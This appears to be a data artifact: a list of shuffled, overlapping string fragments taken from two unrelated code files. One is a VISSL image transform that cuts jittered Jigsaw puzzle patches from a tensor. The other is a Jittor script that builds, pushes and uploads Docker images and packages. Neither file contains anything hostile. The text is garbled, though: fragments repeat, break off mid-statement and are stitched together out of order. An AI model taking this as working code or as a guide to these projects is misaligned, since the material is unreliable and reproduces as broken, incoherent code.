[ "Using num_patches: {num_patches}\") logging.info(f\"ImgPatchesFromTensor | Using patch_jitter: {patch_jitter}\") return cls(num_patches=num_patches,", "ClassyTransform @register_transform(\"ImgPatchesFromTensor\") class ImgPatchesFromTensor(ClassyTransform): \"\"\" Create image patches from a", "ImgPatchesFromTensor(ClassyTransform): \"\"\" Create image patches from a torch Tensor or", "self.num_patches = num_patches self.patch_jitter = patch_jitter assert self.patch_jitter > 0,", "{patch_jitter}\" ) def __call__(self, image): \"\"\" Input image which is", "Any, Dict import numpy as np from classy_vision.dataset.transforms import register_transform", "classy_vision.dataset.transforms.classy_transform import ClassyTransform @register_transform(\"ImgPatchesFromTensor\") class ImgPatchesFromTensor(ClassyTransform): \"\"\" Create image patches", ": y_offset + grid_size, x_offset : x_offset + grid_size ]", "\"Image not cropped properly\" # copy patch data so that", "Instantiates ImgPatchesFromTensor from configuration. Args: config (Dict): arguments for for", "data = [] grid_size = int(image.shape[1] / self.grid_side_len) patch_size =", "cropped properly\" assert patch.shape[2] == patch_size, \"Image not cropped properly\"", "patches from a torch Tensor or numpy array. This transform", "object of shape 3 x H x W \"\"\" data", "in Jigsaw - https://arxiv.org/abs/1603.09246 Args: num_patches (int): how many image", "x_offset + grid_size ] patch = grid_cell[ :, jitter[1, i,", "logging.info(f\"ImgPatchesFromTensor | Using num_patches: {num_patches}\") logging.info(f\"ImgPatchesFromTensor | Using patch_jitter: {patch_jitter}\")", "classy_vision.dataset.transforms import register_transform from classy_vision.dataset.transforms.classy_transform import ClassyTransform @register_transform(\"ImgPatchesFromTensor\") class ImgPatchesFromTensor(ClassyTransform):", "and its affiliates. All Rights Reserved import logging import math", "grid_size ] patch = grid_cell[ :, jitter[1, i, j] :", "patch_size, jitter[0, i, j] : jitter[0, i, j] + patch_size,", "grid_size, x_offset : x_offset + grid_size ] patch = grid_cell[", "[] grid_size = int(image.shape[1] / self.grid_side_len) patch_size = grid_size -", "image patches from a torch Tensor or numpy array. This", "leave between patches \"\"\" def __init__(self, num_patches=9, patch_jitter=21): self.num_patches =", "+ patch_size, jitter[0, i, j] : jitter[0, i, j] +", "was proposed in Jigsaw - https://arxiv.org/abs/1603.09246 Args: num_patches (int): how", "from classy_vision.dataset.transforms import register_transform from classy_vision.dataset.transforms.classy_transform import ClassyTransform @register_transform(\"ImgPatchesFromTensor\") class", "range(self.grid_side_len): for j in range(self.grid_side_len): x_offset = i * grid_size", "assert patch.shape[2] == patch_size, \"Image not cropped properly\" # copy", "import numpy as np from classy_vision.dataset.transforms import register_transform from classy_vision.dataset.transforms.classy_transform", "def __init__(self, num_patches=9, patch_jitter=21): self.num_patches = num_patches self.patch_jitter = patch_jitter", "register_transform from classy_vision.dataset.transforms.classy_transform import ClassyTransform @register_transform(\"ImgPatchesFromTensor\") class ImgPatchesFromTensor(ClassyTransform): \"\"\" Create", "= np.random.randint( 0, self.patch_jitter, (2, self.grid_side_len, self.grid_side_len) ) for i", "Args: config (Dict): arguments for for the transform Returns: ImgPatchesFromTensor", "__call__(self, image): \"\"\" Input image which is a torch.Tensor object", "x H x W \"\"\" data = [] grid_size =", "j] + patch_size, ] assert patch.shape[1] == patch_size, \"Image not", "(c) Facebook, Inc. and its affiliates. All Rights Reserved import", "= j * grid_size grid_cell = image[ :, y_offset :", "Inc. and its affiliates. All Rights Reserved import logging import", "= grid_size - self.patch_jitter jitter = np.random.randint( 0, self.patch_jitter, (2,", "math from typing import Any, Dict import numpy as np", "- self.patch_jitter jitter = np.random.randint( 0, self.patch_jitter, (2, self.grid_side_len, self.grid_side_len)", "patch.shape[1] == patch_size, \"Image not cropped properly\" assert patch.shape[2] ==", "supported\" self.grid_side_len = int(math.sqrt(self.num_patches)) # usually = 3 logging.info( f\"ImgPatchesFromTensor:", "from classy_vision.dataset.transforms.classy_transform import ClassyTransform @register_transform(\"ImgPatchesFromTensor\") class ImgPatchesFromTensor(ClassyTransform): \"\"\" Create image", "https://arxiv.org/abs/1603.09246 Args: num_patches (int): how many image patches to create", "numpy array. This transform was proposed in Jigsaw - https://arxiv.org/abs/1603.09246", "* grid_size y_offset = j * grid_size grid_cell = image[", "+ grid_size, x_offset : x_offset + grid_size ] patch =", "torch.Tensor object of shape 3 x H x W \"\"\"", "Reserved import logging import math from typing import Any, Dict", "3 logging.info( f\"ImgPatchesFromTensor: num_patches: {num_patches} \" f\"patch_jitter: {patch_jitter}\" ) def", "W \"\"\" data = [] grid_size = int(image.shape[1] / self.grid_side_len)", "np.random.randint( 0, self.patch_jitter, (2, self.grid_side_len, self.grid_side_len) ) for i in", "or numpy array. This transform was proposed in Jigsaw -", "Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved", "space to leave between patches \"\"\" def __init__(self, num_patches=9, patch_jitter=21):", "from a torch Tensor or numpy array. This transform was", "This transform was proposed in Jigsaw - https://arxiv.org/abs/1603.09246 Args: num_patches", ":, y_offset : y_offset + grid_size, x_offset : x_offset +", "Args: num_patches (int): how many image patches to create patch_jitter", "(int): space to leave between patches \"\"\" def __init__(self, num_patches=9,", "== patch_size, \"Image not cropped properly\" assert patch.shape[2] == patch_size,", "= 3 logging.info( f\"ImgPatchesFromTensor: num_patches: {num_patches} \" f\"patch_jitter: {patch_jitter}\" )", "\"\"\" num_patches = config.get(\"num_patches\", 9) patch_jitter = config.get(\"patch_jitter\", 21) logging.info(f\"ImgPatchesFromTensor", "y_offset : y_offset + grid_size, x_offset : x_offset + grid_size", "usually = 3 logging.info( f\"ImgPatchesFromTensor: num_patches: {num_patches} \" f\"patch_jitter: {patch_jitter}\"", "def from_config(cls, config: Dict[str, Any]) -> \"ImgPatchesFromTensor\": \"\"\" Instantiates ImgPatchesFromTensor", "\"\"\" Create image patches from a torch Tensor or numpy", "= image[ :, y_offset : y_offset + grid_size, x_offset :", "i * grid_size y_offset = j * grid_size grid_cell =", "i, j] : jitter[0, i, j] + patch_size, ] assert", "not cropped properly\" assert patch.shape[2] == patch_size, \"Image not cropped", "affiliates. All Rights Reserved import logging import math from typing", "Any]) -> \"ImgPatchesFromTensor\": \"\"\" Instantiates ImgPatchesFromTensor from configuration. Args: config", "patch_size, ] assert patch.shape[1] == patch_size, \"Image not cropped properly\"", "grid_size - self.patch_jitter jitter = np.random.randint( 0, self.patch_jitter, (2, self.grid_side_len,", "\"ImgPatchesFromTensor\": \"\"\" Instantiates ImgPatchesFromTensor from configuration. Args: config (Dict): arguments", "# usually = 3 logging.info( f\"ImgPatchesFromTensor: num_patches: {num_patches} \" f\"patch_jitter:", ":, jitter[1, i, j] : jitter[1, i, j] + patch_size,", "that all patches are different in underlying memory data.append(np.copy(patch)) return", ": jitter[1, i, j] + patch_size, jitter[0, i, j] :", "patch_jitter = config.get(\"patch_jitter\", 21) logging.info(f\"ImgPatchesFromTensor | Using num_patches: {num_patches}\") logging.info(f\"ImgPatchesFromTensor", "= i * grid_size y_offset = j * grid_size grid_cell", "np from classy_vision.dataset.transforms import register_transform from classy_vision.dataset.transforms.classy_transform import ClassyTransform @register_transform(\"ImgPatchesFromTensor\")", "patch_jitter assert self.patch_jitter > 0, \"Negative jitter not supported\" self.grid_side_len", "grid_cell[ :, jitter[1, i, j] : jitter[1, i, j] +", "data.append(np.copy(patch)) return data @classmethod def from_config(cls, config: Dict[str, Any]) ->", "patches to create patch_jitter (int): space to leave between patches", "= patch_jitter assert self.patch_jitter > 0, \"Negative jitter not supported\"", "+ grid_size ] patch = grid_cell[ :, jitter[1, i, j]", "for the transform Returns: ImgPatchesFromTensor instance. \"\"\" num_patches = config.get(\"num_patches\",", "0, \"Negative jitter not supported\" self.grid_side_len = int(math.sqrt(self.num_patches)) # usually", "x_offset = i * grid_size y_offset = j * grid_size", "Create image patches from a torch Tensor or numpy array.", "H x W \"\"\" data = [] grid_size = int(image.shape[1]", "transform Returns: ImgPatchesFromTensor instance. \"\"\" num_patches = config.get(\"num_patches\", 9) patch_jitter", "config (Dict): arguments for for the transform Returns: ImgPatchesFromTensor instance.", "__init__(self, num_patches=9, patch_jitter=21): self.num_patches = num_patches self.patch_jitter = patch_jitter assert", "for i in range(self.grid_side_len): for j in range(self.grid_side_len): x_offset =", "self.patch_jitter = patch_jitter assert self.patch_jitter > 0, \"Negative jitter not", "3 x H x W \"\"\" data = [] grid_size", "patch_size, \"Image not cropped properly\" # copy patch data so", "to leave between patches \"\"\" def __init__(self, num_patches=9, patch_jitter=21): self.num_patches", "num_patches (int): how many image patches to create patch_jitter (int):", "grid_size = int(image.shape[1] / self.grid_side_len) patch_size = grid_size - self.patch_jitter", "jitter = np.random.randint( 0, self.patch_jitter, (2, self.grid_side_len, self.grid_side_len) ) for", "y_offset + grid_size, x_offset : x_offset + grid_size ] patch", "is a torch.Tensor object of shape 3 x H x", "(int): how many image patches to create patch_jitter (int): space", "i, j] + patch_size, ] assert patch.shape[1] == patch_size, \"Image", "self.grid_side_len) ) for i in range(self.grid_side_len): for j in range(self.grid_side_len):", "so that all patches are different in underlying memory data.append(np.copy(patch))", "from typing import Any, Dict import numpy as np from", ": jitter[0, i, j] + patch_size, ] assert patch.shape[1] ==", "config: Dict[str, Any]) -> \"ImgPatchesFromTensor\": \"\"\" Instantiates ImgPatchesFromTensor from configuration.", "import register_transform from classy_vision.dataset.transforms.classy_transform import ClassyTransform @register_transform(\"ImgPatchesFromTensor\") class ImgPatchesFromTensor(ClassyTransform): \"\"\"", "patches \"\"\" def __init__(self, num_patches=9, patch_jitter=21): self.num_patches = num_patches self.patch_jitter", "assert self.patch_jitter > 0, \"Negative jitter not supported\" self.grid_side_len =", "shape 3 x H x W \"\"\" data = []", "transform was proposed in Jigsaw - https://arxiv.org/abs/1603.09246 Args: num_patches (int):", "j] + patch_size, jitter[0, i, j] : jitter[0, i, j]", "all patches are different in underlying memory data.append(np.copy(patch)) return data", "i, j] + patch_size, jitter[0, i, j] : jitter[0, i,", "j in range(self.grid_side_len): x_offset = i * grid_size y_offset =", "import ClassyTransform @register_transform(\"ImgPatchesFromTensor\") class ImgPatchesFromTensor(ClassyTransform): \"\"\" Create image patches from", "Dict import numpy as np from classy_vision.dataset.transforms import register_transform from", "data so that all patches are different in underlying memory", "proposed in Jigsaw - https://arxiv.org/abs/1603.09246 Args: num_patches (int): how many", "a torch.Tensor object of shape 3 x H x W", "configuration. Args: config (Dict): arguments for for the transform Returns:", "(Dict): arguments for for the transform Returns: ImgPatchesFromTensor instance. \"\"\"", "for j in range(self.grid_side_len): x_offset = i * grid_size y_offset", "i in range(self.grid_side_len): for j in range(self.grid_side_len): x_offset = i", "i, j] : jitter[1, i, j] + patch_size, jitter[0, i,", "grid_size y_offset = j * grid_size grid_cell = image[ :,", "jitter[1, i, j] + patch_size, jitter[0, i, j] : jitter[0,", "= num_patches self.patch_jitter = patch_jitter assert self.patch_jitter > 0, \"Negative", "different in underlying memory data.append(np.copy(patch)) return data @classmethod def from_config(cls,", "not supported\" self.grid_side_len = int(math.sqrt(self.num_patches)) # usually = 3 logging.info(", "data @classmethod def from_config(cls, config: Dict[str, Any]) -> \"ImgPatchesFromTensor\": \"\"\"", "f\"patch_jitter: {patch_jitter}\" ) def __call__(self, image): \"\"\" Input image which", "num_patches=9, patch_jitter=21): self.num_patches = num_patches self.patch_jitter = patch_jitter assert self.patch_jitter", "in range(self.grid_side_len): x_offset = i * grid_size y_offset = j", "= grid_cell[ :, jitter[1, i, j] : jitter[1, i, j]", "are different in underlying memory data.append(np.copy(patch)) return data @classmethod def", "between patches \"\"\" def __init__(self, num_patches=9, patch_jitter=21): self.num_patches = num_patches", "self.grid_side_len) patch_size = grid_size - self.patch_jitter jitter = np.random.randint( 0,", "num_patches self.patch_jitter = patch_jitter assert self.patch_jitter > 0, \"Negative jitter", "self.patch_jitter jitter = np.random.randint( 0, self.patch_jitter, (2, self.grid_side_len, self.grid_side_len) )", "\"Image not cropped properly\" assert patch.shape[2] == patch_size, \"Image not", "patch.shape[2] == patch_size, \"Image not cropped properly\" # copy patch", "-> \"ImgPatchesFromTensor\": \"\"\" Instantiates ImgPatchesFromTensor from configuration. Args: config (Dict):", "x W \"\"\" data = [] grid_size = int(image.shape[1] /", "self.patch_jitter > 0, \"Negative jitter not supported\" self.grid_side_len = int(math.sqrt(self.num_patches))", "jitter[0, i, j] + patch_size, ] assert patch.shape[1] == patch_size,", "config.get(\"patch_jitter\", 21) logging.info(f\"ImgPatchesFromTensor | Using num_patches: {num_patches}\") logging.info(f\"ImgPatchesFromTensor | Using", "= int(math.sqrt(self.num_patches)) # usually = 3 logging.info( f\"ImgPatchesFromTensor: num_patches: {num_patches}", "ImgPatchesFromTensor instance. \"\"\" num_patches = config.get(\"num_patches\", 9) patch_jitter = config.get(\"patch_jitter\",", "grid_cell = image[ :, y_offset : y_offset + grid_size, x_offset", "\"\"\" Instantiates ImgPatchesFromTensor from configuration. Args: config (Dict): arguments for", "Jigsaw - https://arxiv.org/abs/1603.09246 Args: num_patches (int): how many image patches", "\"Negative jitter not supported\" self.grid_side_len = int(math.sqrt(self.num_patches)) # usually =", "memory data.append(np.copy(patch)) return data @classmethod def from_config(cls, config: Dict[str, Any])", "= config.get(\"num_patches\", 9) patch_jitter = config.get(\"patch_jitter\", 21) logging.info(f\"ImgPatchesFromTensor | Using", "range(self.grid_side_len): x_offset = i * grid_size y_offset = j *", "+ patch_size, ] assert patch.shape[1] == patch_size, \"Image not cropped", "num_patches = config.get(\"num_patches\", 9) patch_jitter = config.get(\"patch_jitter\", 21) logging.info(f\"ImgPatchesFromTensor |", "num_patches: {num_patches}\") logging.info(f\"ImgPatchesFromTensor | Using patch_jitter: {patch_jitter}\") return cls(num_patches=num_patches, patch_jitter=patch_jitter)", "typing import Any, Dict import numpy as np from classy_vision.dataset.transforms", "return data @classmethod def from_config(cls, config: Dict[str, Any]) -> \"ImgPatchesFromTensor\":", "numpy as np from classy_vision.dataset.transforms import register_transform from classy_vision.dataset.transforms.classy_transform import", "Returns: ImgPatchesFromTensor instance. \"\"\" num_patches = config.get(\"num_patches\", 9) patch_jitter =", "0, self.patch_jitter, (2, self.grid_side_len, self.grid_side_len) ) for i in range(self.grid_side_len):", "import logging import math from typing import Any, Dict import", "int(image.shape[1] / self.grid_side_len) patch_size = grid_size - self.patch_jitter jitter =", "grid_size grid_cell = image[ :, y_offset : y_offset + grid_size,", "patch = grid_cell[ :, jitter[1, i, j] : jitter[1, i,", "int(math.sqrt(self.num_patches)) # usually = 3 logging.info( f\"ImgPatchesFromTensor: num_patches: {num_patches} \"", "* grid_size grid_cell = image[ :, y_offset : y_offset +", "jitter[1, i, j] : jitter[1, i, j] + patch_size, jitter[0,", "/ self.grid_side_len) patch_size = grid_size - self.patch_jitter jitter = np.random.randint(", "@register_transform(\"ImgPatchesFromTensor\") class ImgPatchesFromTensor(ClassyTransform): \"\"\" Create image patches from a torch", "logging.info( f\"ImgPatchesFromTensor: num_patches: {num_patches} \" f\"patch_jitter: {patch_jitter}\" ) def __call__(self,", "def __call__(self, image): \"\"\" Input image which is a torch.Tensor", "logging import math from typing import Any, Dict import numpy", ") def __call__(self, image): \"\"\" Input image which is a", "as np from classy_vision.dataset.transforms import register_transform from classy_vision.dataset.transforms.classy_transform import ClassyTransform", "image patches to create patch_jitter (int): space to leave between", "import math from typing import Any, Dict import numpy as", "f\"ImgPatchesFromTensor: num_patches: {num_patches} \" f\"patch_jitter: {patch_jitter}\" ) def __call__(self, image):", "image): \"\"\" Input image which is a torch.Tensor object of", "which is a torch.Tensor object of shape 3 x H", "y_offset = j * grid_size grid_cell = image[ :, y_offset", "jitter[0, i, j] : jitter[0, i, j] + patch_size, ]", "of shape 3 x H x W \"\"\" data =", "= [] grid_size = int(image.shape[1] / self.grid_side_len) patch_size = grid_size", "image[ :, y_offset : y_offset + grid_size, x_offset : x_offset", "to create patch_jitter (int): space to leave between patches \"\"\"", "copy patch data so that all patches are different in", "] patch = grid_cell[ :, jitter[1, i, j] : jitter[1,", "arguments for for the transform Returns: ImgPatchesFromTensor instance. \"\"\" num_patches", "not cropped properly\" # copy patch data so that all", "<filename>swav/vissl/vissl/data/ssl_transforms/img_patches_tensor.py # Copyright (c) Facebook, Inc. and its affiliates. All", "(2, self.grid_side_len, self.grid_side_len) ) for i in range(self.grid_side_len): for j", "for for the transform Returns: ImgPatchesFromTensor instance. \"\"\" num_patches =", "= int(image.shape[1] / self.grid_side_len) patch_size = grid_size - self.patch_jitter jitter", "# Copyright (c) Facebook, Inc. and its affiliates. All Rights", "its affiliates. All Rights Reserved import logging import math from", "\"\"\" Input image which is a torch.Tensor object of shape", "patch_size = grid_size - self.patch_jitter jitter = np.random.randint( 0, self.patch_jitter,", "from_config(cls, config: Dict[str, Any]) -> \"ImgPatchesFromTensor\": \"\"\" Instantiates ImgPatchesFromTensor from", "array. This transform was proposed in Jigsaw - https://arxiv.org/abs/1603.09246 Args:", "All Rights Reserved import logging import math from typing import", "cropped properly\" # copy patch data so that all patches", "patches are different in underlying memory data.append(np.copy(patch)) return data @classmethod", "@classmethod def from_config(cls, config: Dict[str, Any]) -> \"ImgPatchesFromTensor\": \"\"\" Instantiates", "ImgPatchesFromTensor from configuration. Args: config (Dict): arguments for for the", "config.get(\"num_patches\", 9) patch_jitter = config.get(\"patch_jitter\", 21) logging.info(f\"ImgPatchesFromTensor | Using num_patches:", "j] : jitter[1, i, j] + patch_size, jitter[0, i, j]", "import Any, Dict import numpy as np from classy_vision.dataset.transforms import", "jitter not supported\" self.grid_side_len = int(math.sqrt(self.num_patches)) # usually = 3", "] assert patch.shape[1] == patch_size, \"Image not cropped properly\" assert", "== patch_size, \"Image not cropped properly\" # copy patch data", "assert patch.shape[1] == patch_size, \"Image not cropped properly\" assert patch.shape[2]", "create patch_jitter (int): space to leave between patches \"\"\" def", "patch_jitter (int): space to leave between patches \"\"\" def __init__(self,", "in underlying memory data.append(np.copy(patch)) return data @classmethod def from_config(cls, config:", "j] : jitter[0, i, j] + patch_size, ] assert patch.shape[1]", "= config.get(\"patch_jitter\", 21) logging.info(f\"ImgPatchesFromTensor | Using num_patches: {num_patches}\") logging.info(f\"ImgPatchesFromTensor |", "class ImgPatchesFromTensor(ClassyTransform): \"\"\" Create image patches from a torch Tensor", "how many image patches to create patch_jitter (int): space to", ") for i in range(self.grid_side_len): for j in range(self.grid_side_len): x_offset", "- https://arxiv.org/abs/1603.09246 Args: num_patches (int): how many image patches to", "instance. \"\"\" num_patches = config.get(\"num_patches\", 9) patch_jitter = config.get(\"patch_jitter\", 21)", "patch_jitter=21): self.num_patches = num_patches self.patch_jitter = patch_jitter assert self.patch_jitter >", "{num_patches} \" f\"patch_jitter: {patch_jitter}\" ) def __call__(self, image): \"\"\" Input", "j * grid_size grid_cell = image[ :, y_offset : y_offset", "x_offset : x_offset + grid_size ] patch = grid_cell[ :,", ": x_offset + grid_size ] patch = grid_cell[ :, jitter[1,", "underlying memory data.append(np.copy(patch)) return data @classmethod def from_config(cls, config: Dict[str,", "self.grid_side_len, self.grid_side_len) ) for i in range(self.grid_side_len): for j in", "\"\"\" data = [] grid_size = int(image.shape[1] / self.grid_side_len) patch_size", "self.patch_jitter, (2, self.grid_side_len, self.grid_side_len) ) for i in range(self.grid_side_len): for", "in range(self.grid_side_len): for j in range(self.grid_side_len): x_offset = i *", "Rights Reserved import logging import math from typing import Any,", "properly\" # copy patch data so that all patches are", "many image patches to create patch_jitter (int): space to leave", "the transform Returns: ImgPatchesFromTensor instance. \"\"\" num_patches = config.get(\"num_patches\", 9)", "21) logging.info(f\"ImgPatchesFromTensor | Using num_patches: {num_patches}\") logging.info(f\"ImgPatchesFromTensor | Using patch_jitter:", "\"\"\" def __init__(self, num_patches=9, patch_jitter=21): self.num_patches = num_patches self.patch_jitter =", "self.grid_side_len = int(math.sqrt(self.num_patches)) # usually = 3 logging.info( f\"ImgPatchesFromTensor: num_patches:", "Input image which is a torch.Tensor object of shape 3", "num_patches: {num_patches} \" f\"patch_jitter: {patch_jitter}\" ) def __call__(self, image): \"\"\"", "Facebook, Inc. and its affiliates. All Rights Reserved import logging", "# copy patch data so that all patches are different", "> 0, \"Negative jitter not supported\" self.grid_side_len = int(math.sqrt(self.num_patches)) #", "image which is a torch.Tensor object of shape 3 x", "patch data so that all patches are different in underlying", "patch_size, \"Image not cropped properly\" assert patch.shape[2] == patch_size, \"Image", "| Using num_patches: {num_patches}\") logging.info(f\"ImgPatchesFromTensor | Using patch_jitter: {patch_jitter}\") return", "torch Tensor or numpy array. This transform was proposed in", "Tensor or numpy array. This transform was proposed in Jigsaw", "9) patch_jitter = config.get(\"patch_jitter\", 21) logging.info(f\"ImgPatchesFromTensor | Using num_patches: {num_patches}\")", "Dict[str, Any]) -> \"ImgPatchesFromTensor\": \"\"\" Instantiates ImgPatchesFromTensor from configuration. Args:", "properly\" assert patch.shape[2] == patch_size, \"Image not cropped properly\" #", "\" f\"patch_jitter: {patch_jitter}\" ) def __call__(self, image): \"\"\" Input image", "a torch Tensor or numpy array. This transform was proposed", "from configuration. Args: config (Dict): arguments for for the transform" ]
[ "# upload to pip: # rm -rf dist && python3.7", "chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker build --tag", "# *************************************************************** # Publish steps: # 1. build,push,upload docker image[jittor/jittor]", "# 1. build,push,upload docker image[jittor/jittor] # 2. build,push,upload docker image[jittor/jittor-cuda]", "source code package. # *************************************************************** # Publish steps: # 1.", "2. build,push,upload docker image[jittor/jittor-cuda] # upload to pip: # rm", "docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 .", "--network host\" ) docker_task( \"jittor/jittor-cuda\", \"sudo docker build --tag jittor/jittor-cuda:latest", "host\" ) docker_task( \"jittor/jittor\", \"sudo docker build --tag jittor/jittor:latest .", "docker image[jittor/jittor] # 2. build,push,upload docker image[jittor/jittor-cuda] # upload to", "file is subject to the terms and conditions defined in", "-rf dist && python3.7 ./setup.py sdist && python3.7 -m twine", "pip: # rm -rf dist && python3.7 ./setup.py sdist &&", "docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host\" )", ". --network host\" ) docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker build --tag", "dist && python3.7 ./setup.py sdist && python3.7 -m twine upload", "(c) 2022 Jittor. All Rights Reserved. # Maintainers: # <NAME>", "# Copyright (c) 2022 Jittor. All Rights Reserved. # Maintainers:", "build,push,upload docker image[jittor/jittor-cuda] # upload to pip: # rm -rf", "build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host\" ) run_cmd(\"ssh", "rm -rf dist && python3.7 ./setup.py sdist && python3.7 -m", "image[jittor/jittor] # 2. build,push,upload docker image[jittor/jittor-cuda] # upload to pip:", "subject to the terms and conditions defined in # file", "cmd) assert os.system(cmd) == 0 def upload_file(path): run_cmd(f\"rsync -avPu {path}", "{name}:latest -o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task(", "upload dist/* import os def run_cmd(cmd): print(\"[run cmd]\", cmd) assert", "\"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host\"", "# This file is subject to the terms and conditions", "python3.7 -m twine upload dist/* import os def run_cmd(cmd): print(\"[run", "docker push {name}\") bname = os.path.basename(name) run_cmd(f\"sudo docker save {name}:latest", "docker_task( \"jittor/jittor\", \"sudo docker build --tag jittor/jittor:latest . --network host\"", "\"jittor/jittor-cuda-11-1\", \"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network", "docker build --tag jittor/jittor:latest . --network host\" ) docker_task( \"jittor/jittor-cuda\",", "/tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f", "defined in # file 'LICENSE.txt', which is part of this", "#!/usr/bin/python3 # *************************************************************** # Copyright (c) 2022 Jittor. All Rights", "--tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host\" ) run_cmd(\"ssh jittor-web", "in # file 'LICENSE.txt', which is part of this source", ". --network host\" ) docker_task( \"jittor/jittor\", \"sudo docker build --tag", "file 'LICENSE.txt', which is part of this source code package.", "&& python3.7 -m twine upload dist/* import os def run_cmd(cmd):", "dist/* import os def run_cmd(cmd): print(\"[run cmd]\", cmd) assert os.system(cmd)", "twine upload dist/* import os def run_cmd(cmd): print(\"[run cmd]\", cmd)", "which is part of this source code package. # ***************************************************************", "/tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo", "<NAME> <<EMAIL>>. # # This file is subject to the", ". --network host\" ) docker_task( \"jittor/jittor-cuda\", \"sudo docker build --tag", "build --tag jittor/jittor:latest . --network host\" ) docker_task( \"jittor/jittor-cuda\", \"sudo", "bname = os.path.basename(name) run_cmd(f\"sudo docker save {name}:latest -o /tmp/{bname}.tgz &&", "Copyright (c) 2022 Jittor. All Rights Reserved. # Maintainers: #", "# file 'LICENSE.txt', which is part of this source code", "*************************************************************** # Copyright (c) 2022 Jittor. All Rights Reserved. #", "run_cmd(f\"sudo docker save {name}:latest -o /tmp/{bname}.tgz && sudo chmod 666", "docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host\" )", "== 0 def upload_file(path): run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name,", "def run_cmd(cmd): print(\"[run cmd]\", cmd) assert os.system(cmd) == 0 def", "*************************************************************** # Publish steps: # 1. build,push,upload docker image[jittor/jittor] #", "build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host\" ) docker_task(", "docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' .", ") docker_task( \"jittor/jittor-cuda\", \"sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04'", "host\" ) docker_task( \"jittor/jittor-cuda\", \"sudo docker build --tag jittor/jittor-cuda:latest --build-arg", "0 def upload_file(path): run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, build_cmd):", "./setup.py sdist && python3.7 -m twine upload dist/* import os", "upload_file(path): run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo", ") docker_task( \"jittor/jittor\", \"sudo docker build --tag jittor/jittor:latest . --network", "upload to pip: # rm -rf dist && python3.7 ./setup.py", "jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker push {name}\") bname", "Reserved. # Maintainers: # <NAME> <<EMAIL>>. # # This file", "build_cmd): run_cmd(build_cmd) run_cmd(f\"sudo docker push {name}\") bname = os.path.basename(name) run_cmd(f\"sudo", "# <NAME> <<EMAIL>>. # # This file is subject to", "jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host\" ) docker_task( \"jittor/jittor\", \"sudo", "to the terms and conditions defined in # file 'LICENSE.txt',", "build,push,upload docker image[jittor/jittor] # 2. build,push,upload docker image[jittor/jittor-cuda] # upload", "docker_task( \"jittor/jittor-cuda\", \"sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' .", "-m twine upload dist/* import os def run_cmd(cmd): print(\"[run cmd]\",", "# 2. build,push,upload docker image[jittor/jittor-cuda] # upload to pip: #", "run_cmd(f\"sudo docker push {name}\") bname = os.path.basename(name) run_cmd(f\"sudo docker save", "the terms and conditions defined in # file 'LICENSE.txt', which", "terms and conditions defined in # file 'LICENSE.txt', which is", "jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host\" ) docker_task( \"jittor/jittor-cuda-10-1\", \"sudo", "--network host\" ) docker_task( \"jittor/jittor-cuda-10-1\", \"sudo docker build --tag jittor/jittor-cuda-10-1:latest", "--tag jittor/jittor:latest . --network host\" ) docker_task( \"jittor/jittor-cuda\", \"sudo docker", "and conditions defined in # file 'LICENSE.txt', which is part", "is part of this source code package. # *************************************************************** #", "print(\"[run cmd]\", cmd) assert os.system(cmd) == 0 def upload_file(path): run_cmd(f\"rsync", "docker save {name}:latest -o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz\")", "All Rights Reserved. # Maintainers: # <NAME> <<EMAIL>>. # #", "Rights Reserved. # Maintainers: # <NAME> <<EMAIL>>. # # This", "666 /tmp/{bname}.tgz\") upload_file(f\"/tmp/{bname}.tgz\") docker_task( \"jittor/jittor-cuda-11-1\", \"sudo docker build --tag jittor/jittor-cuda-11-1:latest", "push {name}\") bname = os.path.basename(name) run_cmd(f\"sudo docker save {name}:latest -o", "def upload_file(path): run_cmd(f\"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/\") def docker_task(name, 